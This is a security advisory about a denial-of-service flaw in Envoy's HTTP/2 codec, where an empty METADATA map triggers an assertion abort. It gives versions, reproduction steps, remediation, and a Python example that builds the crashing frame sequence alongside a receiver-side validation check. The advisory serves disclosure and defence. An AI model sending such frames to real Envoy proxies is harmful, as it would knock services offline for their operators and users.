Envoy HTTP/2 Metadata Map Assertion Failure Leading to Denial-of-Service

Vulnerability

A denial-of-service vulnerability exists in Envoy's HTTP/2 codec. Affected releases are Envoy 1.14.0 and later releases that predate the fixed versions listed under Remediation (1.14.0 through 1.14.6, and the 1.15, 1.16 and 1.17 lines before their respective fixes). An HTTP/2 request that carries a METADATA frame whose metadata map is empty reaches an assertion in the metadata decoding path, and the failed assertion aborts the Envoy process. Any remote client that can complete an HTTP/2 connection to a listener with METADATA frame support enabled can trigger the condition; no authentication is required. The metadata extension is off by default (allow_metadata in http2_protocol_options), so a listener that never enabled it does not parse the frame and is not exposed.

Impact

A single crafted request terminates the Envoy process, which drops every connection the proxy was serving at that moment. Because the request needs no authentication and can be replayed, an attacker can keep the proxy down for as long as it is reachable, even when a supervisor restarts it after each crash. The failure is an assertion abort rather than memory corruption, so the impact is limited to availability.

Reproduction

To reproduce, open an HTTP/2 connection to a listener on which METADATA frame support is enabled and send a request stream that includes a METADATA frame whose HPACK block decodes to no fields (an empty metadata map). An unpatched Envoy fails the assertion and exits.
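The frames involved, as an added example written for this advisory (not Envoy code and not a script from the original page): it builds the client-side byte sequence described above, a preface, SETTINGS, HEADERS and a METADATA frame with an empty map, and pairs it with the receiver-side check that a hardened decoder would apply, rejecting an END_METADATA frame that decodes to zero fields as a protocol error instead of asserting. The RFC 7540 frame header and RFC 7541 literal encoding are standard; the METADATA frame type 0x4D and END_METADATA flag 0x4 are taken from Envoy's documented metadata extension. The host, path and the placement of METADATA after HEADERS are assumptions of the example, and the script never opens a connection.

```python
"""HTTP/2 METADATA frame builder and receiver-side check.

Constructed example for this advisory, not Envoy code. METADATA type 0x4D and
the END_METADATA flag 0x4 follow Envoy's HTTP/2 metadata extension; host and
path below are placeholders.
"""
import struct

METADATA_FRAME_TYPE = 0x4D  # Envoy extension frame type for METADATA
END_METADATA = 0x4          # flag: this frame completes the metadata map
HEADERS_FRAME_TYPE = 0x1    # RFC 7540 HEADERS
END_HEADERS = 0x4           # RFC 7540 HEADERS flag
SETTINGS_FRAME_TYPE = 0x4   # RFC 7540 SETTINGS
HTTP2_PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"


def hpack_literal(name: str, value: str) -> bytes:
    """HPACK literal field without indexing, new name, no Huffman (RFC 7541 6.2.2).
    Strings stay under 127 bytes so each length fits one octet with the Huffman bit clear."""
    n, v = name.encode(), value.encode()
    if len(n) >= 127 or len(v) >= 127:
        raise ValueError("string too long for single-octet HPACK length")
    return b"\x00" + bytes([len(n)]) + n + bytes([len(v)]) + v


def decode_literals(block: bytes) -> list:
    """Decode the HPACK subset emitted by hpack_literal into a field list.
    Other representations raise; a real decoder must handle indexed and Huffman
    forms before a field count can be trusted."""
    fields, i = [], 0
    while i < len(block):
        if block[i] != 0x00:
            raise ValueError("unsupported HPACK representation at offset %d" % i)
        i += 1
        strings = []
        for _ in range(2):  # name, then value
            if i >= len(block):
                raise ValueError("truncated HPACK block")
            length = block[i]
            if length & 0x80 or length == 127:
                raise ValueError("Huffman or multi-octet length not supported")
            i += 1
            if i + length > len(block):
                raise ValueError("truncated HPACK string")
            strings.append(block[i:i + length].decode())
            i += length
        fields.append((strings[0], strings[1]))
    return fields


def build_frame(frame_type: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    """RFC 7540 frame: 24-bit length, 8-bit type, 8-bit flags, 31-bit stream id."""
    if len(payload) >= 1 << 24:
        raise ValueError("payload exceeds 24-bit frame length")
    header = struct.pack(">I", len(payload))[1:] + bytes([frame_type, flags])
    return header + struct.pack(">I", stream_id & 0x7FFFFFFF) + payload


def build_metadata_frame(stream_id: int, fields: dict) -> bytes:
    """METADATA frame for a key/value map. An empty dict yields a zero-length
    HPACK block, which is the empty map this advisory describes."""
    block = b"".join(hpack_literal(k, v) for k, v in fields.items())
    return build_frame(METADATA_FRAME_TYPE, END_METADATA, stream_id, block)


def build_request(stream_id: int, metadata: dict, path: str = "/") -> bytes:
    """Bytes a client writes on a fresh connection: preface, empty SETTINGS, a
    HEADERS frame opening the stream, then the METADATA frame. Sending METADATA
    after HEADERS is this example's choice, not something the advisory states."""
    pseudo = [(":method", "GET"), (":scheme", "http"),
              (":path", path), (":authority", "example.test")]  # placeholders
    headers = b"".join(hpack_literal(k, v) for k, v in pseudo)
    return (HTTP2_PREFACE
            + build_frame(SETTINGS_FRAME_TYPE, 0, 0, b"")
            + build_frame(HEADERS_FRAME_TYPE, END_HEADERS, stream_id, headers)
            + build_metadata_frame(stream_id, metadata))


def parse_frame(buf: bytes):
    """Split one frame off the front of buf: (type, flags, stream_id, payload, rest)."""
    if len(buf) < 9:
        raise ValueError("truncated frame header")
    length = int.from_bytes(buf[:3], "big")
    frame_type, flags = buf[3], buf[4]
    stream_id = struct.unpack(">I", buf[5:9])[0] & 0x7FFFFFFF
    if len(buf) < 9 + length:
        raise ValueError("truncated frame payload")
    return frame_type, flags, stream_id, buf[9:9 + length], buf[9 + length:]


def check_metadata_frame(frame: bytes) -> str:
    """Receiver-side validation: a METADATA frame that completes a map
    (END_METADATA set) yet decodes to no fields is the condition in this
    advisory and is rejected as a protocol error, not left to an assertion."""
    frame_type, flags, _stream_id, payload, _rest = parse_frame(frame)
    if frame_type != METADATA_FRAME_TYPE:
        return "not-metadata"
    try:
        fields = decode_literals(payload)
    except ValueError as exc:
        return "reject: %s" % exc
    if flags & END_METADATA and not fields:
        return "reject: empty METADATA map"
    return "ok"
```

check_metadata_frame counts decoded fields rather than testing for a zero-length payload, because an HPACK block can be non-empty and still contain no fields; the decoder here only understands the literal form the builder emits and rejects everything else, which is the safe direction for a pre-check.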

Remediation

Upgrade to Envoy 1.14.7, 1.15.4, 1.16.3, 1.17.2 or 1.18.0 (or a later release in the same line). Where an upgrade is not immediately possible, disable HTTP/2 METADATA frame support: leave allow_metadata unset or false in the http2_protocol_options of every listener and cluster. After the change, confirm that no remaining configuration, including listeners delivered over xDS, sets the flag, since the frame is only parsed when the extension is enabled.

Added: Apr 7, 2026, 11:28 AM
Updated: Apr 7, 2026, 11:28 AM

Vulnerability Rating

Custom Algorithm

  spread          7.3
  impact          2.5
  exploitability  9.1
  remediation     7.9
  relevance       0.0
  threat          4.8
  urgency         2.9
  incentive       8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.